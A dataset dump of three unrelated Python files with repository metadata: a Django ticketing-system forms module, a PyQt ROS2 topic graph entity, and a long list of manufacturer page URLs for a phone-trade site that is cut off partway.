abzer0x/training | 4,604,204,953,115 | 4a9d0b3fe7fdb925ac22a74164d5176b11deeff4 | d8c1cae31ac0d10266e340905528afd9be16e458 | /training/ticketing_system/forms.py | 37782c253a42e1698ab30a247efda541defb1bbd | [
"MIT"
]
| permissive | https://github.com/abzer0x/training | 1c3065d774c0507df781f34a981ca3a931eb92cb | 7f418d563280b9d1ab939935206b023e4206cb54 | refs/heads/master | 2021-07-17T22:19:18.483633 | 2017-10-23T12:07:03 | 2017-10-23T12:07:03 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from django import forms
from .models import User
from .models import Ticket
CLASSES_INPUT_FIELD = {
'class': 'form-control'
}
class SignInForm(forms.Form):
email = forms.EmailField(
widget=forms.EmailInput(attrs=CLASSES_INPUT_FIELD),
max_length=150,
label='Email'
)
password = forms.CharField(
widget=forms.PasswordInput(attrs=CLASSES_INPUT_FIELD),
min_length=8,
max_length=60,
help_text='Use at least 8 characters.',
label='Password'
)
confirm_password = forms.CharField(
widget=forms.PasswordInput(attrs=CLASSES_INPUT_FIELD),
max_length=60,
label='Confirm Password'
)
name = forms.CharField(
widget=forms.TextInput(attrs=CLASSES_INPUT_FIELD),
max_length=150,
label='Name')
class LoginForm(forms.ModelForm):
class Meta:
model = User
fields = ['email', 'password']
widgets = {
'email': forms.TextInput(attrs=CLASSES_INPUT_FIELD),
'password': forms.PasswordInput(attrs=CLASSES_INPUT_FIELD),
}
class TicketCreateForm(forms.ModelForm):
class Meta:
model = Ticket
fields = ['title', 'body', 'assignee', 'status', 'author', 'created']
widgets = {
'title': forms.TextInput(attrs=CLASSES_INPUT_FIELD),
'body': forms.Textarea(attrs=CLASSES_INPUT_FIELD),
'author': forms.TextInput(attrs={
'class': 'form-control',
'readonly': 'readonly'
}),
'status': forms.Select(attrs={
'class': 'form-control',
'value': 'O'
}),
'created': forms.DateTimeInput(attrs={
'class': 'form-control',
'readonly': 'readonly'
}, format='%Y-%m-%d'),
'assignee': forms.SelectMultiple(
attrs={
'class': 'form-control select-multiple'
},
),
}
def __init__(self, *args, **kwargs):
super(TicketCreateForm, self).__init__(*args, **kwargs)
self.fields['assignee'].required = False
self.fields['author'].required = False
self.fields['status'].required = False
self.fields['created'].required = False
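# A hedged usage sketch (not part of the original module); the view wiring and
# the initial values below are illustrative assumptions:
#
#     form = TicketCreateForm(request.POST or None,
#                             initial={'author': request.user, 'status': 'O'})
#     if form.is_valid():
#         form.save()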
| UTF-8 | Python | false | false | 2,347 | py | 29 | forms.py | 5 | 0.550064 | 0.544525 | 0 | 80 | 28.3375 | 77 |
isse-augsburg/ROSSi | 12,747,462,964,015 | 6d9aa8e1e74bcfec8c5493899df1ece7807984fd | 53760bc15c89e0867739f91e8ea185dfaa4cc59c | /ROSSi_workspace/rossi_plugin/src/rossi_plugin/Ros2UI/UI/Editors/LiveDiagram/GraphEntities/RosRunningTopicGraphEntity.py | 13755d6250f9fea55610ead36ee2ee2d160d7dca | [
"MIT"
]
| permissive | https://github.com/isse-augsburg/ROSSi | 4af85c9febeda19f837a1685121ed5c373011dec | 66a23b6c133069325096d6e199e53d293e42d61b | refs/heads/main | 2023-07-15T08:44:54.524001 | 2021-08-31T14:42:24 | 2021-08-31T14:42:24 | 401,715,071 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import Dict, List
from PyQt5 import QtCore, QtGui
from PyQt5.QtCore import QRectF
from PyQt5.QtWidgets import QGraphicsItem
from .RosRunningNodeGraphEntity import RosRunningNodeGraphEntity
from ...RosNodeEditor.utils import getAllFieldsOfTopic
from ....BaseGraphEntities.GraphMultipleEntryPort import GraphMultipleEntryPort
from ....UIElements.DialogWindow import DisplayParameter
from .....utils import dynamic_import_ros2_msg
from .....Representations.Ros2Representations.RosTopic import RosTopic
from ....BaseGraphEntities.AbstractGraphEntity import DataObject
from ....BaseGraphEntities.GraphExitPort import GraphExitPort
from ....BaseGraphEntities.StandartGraphEntity import StandartGraphEntity
class RosRunningTopicGraphEntity(StandartGraphEntity):
original_height: float = 70
entry: GraphMultipleEntryPort
exit: GraphExitPort
def __init__(self, topic: RosTopic, x: float, y: float, width: float = 70, height: float = 70, parent: QGraphicsItem = None, node=None):
super().__init__(parent, -1, x, y, width, self.original_height)
self.exit = GraphExitPort(self, self.width, self.height/2)
self.entry = GraphMultipleEntryPort(self, 0, self.height/2)
self.topic = topic
self.node = node
self.param = DisplayParameter("")
self.msg_dic = {}
self.createSubscriber()
    def createSubscriber(self):
        try:
            klass = dynamic_import_ros2_msg(self.topic.msg_type[0])
            self.msg_dic = getAllFieldsOfTopic(self.topic.msg_type[0])
            self.node.create_subscription(klass, self.topic.name, self.callback, 10)
            klass()  # instantiate once to check the imported message type is usable
        except Exception:
            self.param.setText("couldn't find class of msg type...")
    def callback(self, msg):
        if self.param is not None:
            self.last_msg = msg
            t = self.pretty(self.msg_dic, self.last_msg)
            self.param.setText(t if t else "no readable fields for this message type")
    def pretty(self, d, msg, indent=0) -> str:
        """Recursively renders the field dictionary with the current message values as text."""
        ret = ""
        for key, value in d.items():
            if isinstance(value, dict):
                ret += '\t' * indent + str(key) + "\n"
                ret += self.pretty(value, msg, indent + 1) + "\n"
            else:
                if hasattr(msg, key):
                    ret += '\t' * (indent + 1) + str(key) + " (" + str(value) + ")" + ": " + str(getattr(msg, key)) + "\n"
        return ret
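    # Illustrative example (hedged; the message type is an assumption): with a
    # field dict {'data': 'string'} and a msg whose .data == 'hi', pretty()
    # returns "\tdata (string): hi\n".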
def paint(self, painter, option, widget):
super(RosRunningTopicGraphEntity, self).paint(painter, option, widget)
painter.drawText(QRectF(0, 0, self.width, self.original_height), QtCore.Qt.AlignCenter | QtCore.Qt.AlignCenter, self.topic.name)
def getData(self) -> DataObject:
pass
def _toDict(self) -> Dict:
pass
def toCode(self, intendLevel: int = 0):
pass
def getProperties(self):
return [self.param]
def mouseDoubleClickEvent(self, event: QtGui.QMouseEvent):
super(RosRunningTopicGraphEntity, self).mouseDoubleClickEvent(event)
self.param = DisplayParameter("")
def equals(self, topic: 'RosRunningTopicGraphEntity') -> bool:
return self.topic.equals(topic.topic)
def addPublisher(self, node: RosRunningNodeGraphEntity):
self.entry.connect(node.exit)
node.exit.drawConnection(self.entry)
def addSubscriber(self, node: RosRunningNodeGraphEntity):
node.entry.connect(self.exit)
self.exit.drawConnection(node.entry)
def removePublisher(self, node: RosRunningNodeGraphEntity):
node.exit.removeConnection(self.entry)
self.entry.disconnect(node.exit)
def removeSubscriber(self, node: RosRunningNodeGraphEntity):
node.entry.disconnect(self.exit)
self.exit.removeConnection(node.entry)
def getPublishers(self) -> List[RosRunningNodeGraphEntity]:
ret = []
for port in self.entry.connected_to_n:
ret.append(port.parentItem())
return ret
def getSubscribers(self) -> List[RosRunningNodeGraphEntity]:
ret = []
for line in self.exit.lines:
ret.append(line.target.parentItem())
return ret | UTF-8 | Python | false | false | 4,430 | py | 54 | RosRunningTopicGraphEntity.py | 52 | 0.644921 | 0.637923 | 0 | 113 | 38.212389 | 140 |
shengqiu/scrap | 6,408,091,234,519 | 9c86feae80332fd0bbdeb6f4936808fb3ab3b141 | 26abbca72c670b15995455dc3913172b8640d305 | /test/nameScript.py | 5d7be89579f1fa99e034d6a64cc52e91fb17e143 | []
| no_license | https://github.com/shengqiu/scrap | eca4550d5f5d5506feabd6a98be42cc214dc8ceb | 64a1730b6c40a64feeb83f9f0606dce196ffdb57 | refs/heads/master | 2019-12-18T16:10:03.535858 | 2017-04-21T01:38:15 | 2017-04-21T01:38:15 | 88,935,543 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | brandDict = [
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/1?&p=1', 'brand': u'Acer'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/1?&p=2', 'brand': u'Acer'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/279', 'brand': u'Advantech'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/308', 'brand': u'Advent'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/368', 'brand': u'Agm'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/74?&p=1', 'brand': u'Alcatel'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/74?&p=2', 'brand': u'Alcatel'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/74?&p=3', 'brand': u'Alcatel'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/74?&p=4', 'brand': u'Alcatel'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/74?&p=5', 'brand': u'Alcatel'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/74?&p=6', 'brand': u'Alcatel'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/224', 'brand': u'Aluratek'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/4?&p=1', 'brand': u'Amazon'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/4?&p=2', 'brand': u'Amazon'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/357', 'brand': u'amgoo'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/298', 'brand': u'Amp'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/223', 'brand': u'Android'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/209', 'brand': u'Apex'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=1', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=2', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=3', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=4', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=5', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=6', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=7', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=8', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=9', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=10', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=11', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=12', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=13', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/6?&p=14', 'brand': u'Apple'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/78', 'brand': u'Archos'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/353', 'brand': u'Artchros'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/7?&p=1', 'brand': u'ASUS'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/7?&p=2', 'brand': u'ASUS'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/8', 'brand': u'AT&T'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/9?&p=1', 'brand': u'Audiovox'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/9?&p=2', 'brand': u'Audiovox'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/273', 'brand': u'Augen'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/260', 'brand': u'Azpen'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/11', 'brand': u'Barnes & Noble'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/317', 'brand': u'BBK'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/12?&p=1', 'brand': u'BlackBerry'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/12?&p=2', 'brand': u'BlackBerry'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/12?&p=3', 'brand': u'BlackBerry'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/12?&p=4', 'brand': u'BlackBerry'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/12?&p=5', 'brand': u'BlackBerry'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/12?&p=6', 'brand': u'BlackBerry'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/135?&p=1', 'brand': u'Blu'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/135?&p=2', 'brand': u'Blu'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/135?&p=3', 'brand': u'Blu'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/135?&p=4', 'brand': u'Blu'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/262', 'brand': u'Bmobile'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/265', 'brand': u'Budget Mobile'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/372', 'brand': u'Buzz'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/15', 'brand': u'Casio'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/126', 'brand': u'Caterpillar'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/300', 'brand': u'Cellon'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/96', 'brand': u'Cincinnati Bell'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/314', 'brand': u'CINGULAR'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/301', 'brand': u'Cinterion'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/86', 'brand': u'Cisco'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/269', 'brand': u'Clearnet'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/337', 'brand': u'Cobalt'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/151', 'brand': u'Coby Kyros'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/158', 'brand': u'Commtiva'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/119', 'brand': u'Coolpad'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/347', 'brand': u'COP'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/225', 'brand': u'Craig'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/98', 'brand': u'Cricket'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/394', 'brand': u'Cubot'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/83', 'brand': u'Custom'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/120', 'brand': u'Dapeng'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/19', 'brand': u'Dell'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/333', 'brand': u'Digicell'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/307', 'brand': u'Digiland'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/361', 'brand': u'Digital2'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/226', 'brand': u'Digix'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/211', 'brand': u'Doogee Mobile'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/121', 'brand': u'Doro'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/227', 'brand': u'Double Power Technology Inc.'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/283', 'brand': u'Eastcom'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/288', 'brand': u'Ecom'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/389', 'brand': u'Ekit'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/142', 'brand': u'Ellipsis'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/302', 'brand': u'Enfora'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/228', 'brand': u'EnviZen-Digital'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/20', 'brand': u'Ericsson'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/229', 'brand': u'Evga.Com Corp'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/261', 'brand': u'ExoPC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/230', 'brand': u'Filemate'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/385', 'brand': u'Firefly'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/73', 'brand': u'Fujitsu'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/124', 'brand': u'Garmin'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/155', 'brand': u'Garmin-Asus'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/22', 'brand': u'Gateway'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/376', 'brand': u'Gionee'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/378', 'brand': u'GO'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/24', 'brand': u'Google'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/215', 'brand': u'Gowell'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/349', 'brand': u'H20'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/231', 'brand': u'Hannspree'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/285', 'brand': u'Herbalife'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/232', 'brand': u'Hipstreet'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/233', 'brand': u'Hisense'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/97', 'brand': u'Hitachi'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/25?&p=1', 'brand': u'HP'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/25?&p=2', 'brand': u'HP'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/115', 'brand': u'HP Compaq'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=1', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=2', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=3', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=4', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=5', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=6', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=7', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=8', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=9', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=10', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=11', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=12', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=13', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=14', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/26?&p=15', 'brand': u'HTC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/27?&p=1', 'brand': u'Huawei'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/27?&p=2', 'brand': u'Huawei'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/27?&p=3', 'brand': u'Huawei'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/27?&p=4', 'brand': u'Huawei'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/27?&p=5', 'brand': u'Huawei'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/299', 'brand': u'Hyundai'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/203', 'brand': u'i-mate'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/316', 'brand': u'IMR'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/331', 'brand': u'InFocus'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/111', 'brand': u'Innostream'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/263', 'brand': u'INQ'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/125', 'brand': u'Insignia'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/110', 'brand': u'iRex'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/109', 'brand': u'iRiver'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/148', 'brand': u'Irulu'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/338', 'brand': u'Itel'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/234', 'brand': u'iVIEW'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/212', 'brand': u'Iwireless'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/324', 'brand': u'Jiayu'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/321', 'brand': u'Karbonn'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/235', 'brand': u'Kaser'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/284', 'brand': u'Kobo'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/286', 'brand': u'Kurio'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/31?&p=1', 'brand': u'Kyocera'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/31?&p=2', 'brand': u'Kyocera'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/31?&p=3', 'brand': u'Kyocera'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/31?&p=4', 'brand': u'Kyocera'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/31?&p=5', 'brand': u'Kyocera'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/32', 'brand': u'LaCie'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/145', 'brand': u'Latte'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/329', 'brand': u'Lava'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/152', 'brand': u'LeapFrog'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/33?&p=1', 'brand': u'Lenovo'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/33?&p=2', 'brand': u'Lenovo'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/116', 'brand': u'Lenovo/IBM'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/236', 'brand': u'Le Pan'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=1', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=2', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=3', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=4', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=5', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=6', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=7', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=8', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=9', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=10', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=11', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=12', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=13', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=14', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=15', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=16', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=17', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=18', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=19', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=20', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=21', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=22', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=23', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=24', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=25', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=26', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/34?&p=27', 'brand': u'LG'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/219', 'brand': u'Logic'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/201', 'brand': u'Lynxx'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/237', 'brand': u'Mach Speed'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/238', 'brand': u'Matsunichi'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/375', 'brand': u'Max'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/264', 'brand': u'Maxwest'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/239', 'brand': u'Maylong'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/364', 'brand': u'MBD'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/327', 'brand': u'Meizu'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/221', 'brand': u'm-horse'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/274', 'brand': u'MI'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/214', 'brand': u'Micromax'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/240', 'brand': u'Microsel'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/37?&p=1', 'brand': u'Microsoft'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/37?&p=2', 'brand': u'Microsoft'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/123', 'brand': u'MID'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/370', 'brand': u'MIng'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/112', 'brand': u'MiTAC'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/39', 'brand': u'Mitsubishi'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/220', 'brand': u'Mobiper'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/241', 'brand': u'Monster'},
    {'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=1', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=2', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=3', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=4', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=5', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=6', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=7', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=8', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=9', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=10', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=11', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=12', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=13', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=14', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=15', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=16', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=17', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=18', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=19', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=20', 'brand': u'Motorola'},
